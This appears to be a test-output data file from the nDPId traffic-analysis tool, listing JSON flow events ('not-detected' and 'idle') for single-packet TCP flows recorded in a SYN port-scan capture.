-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 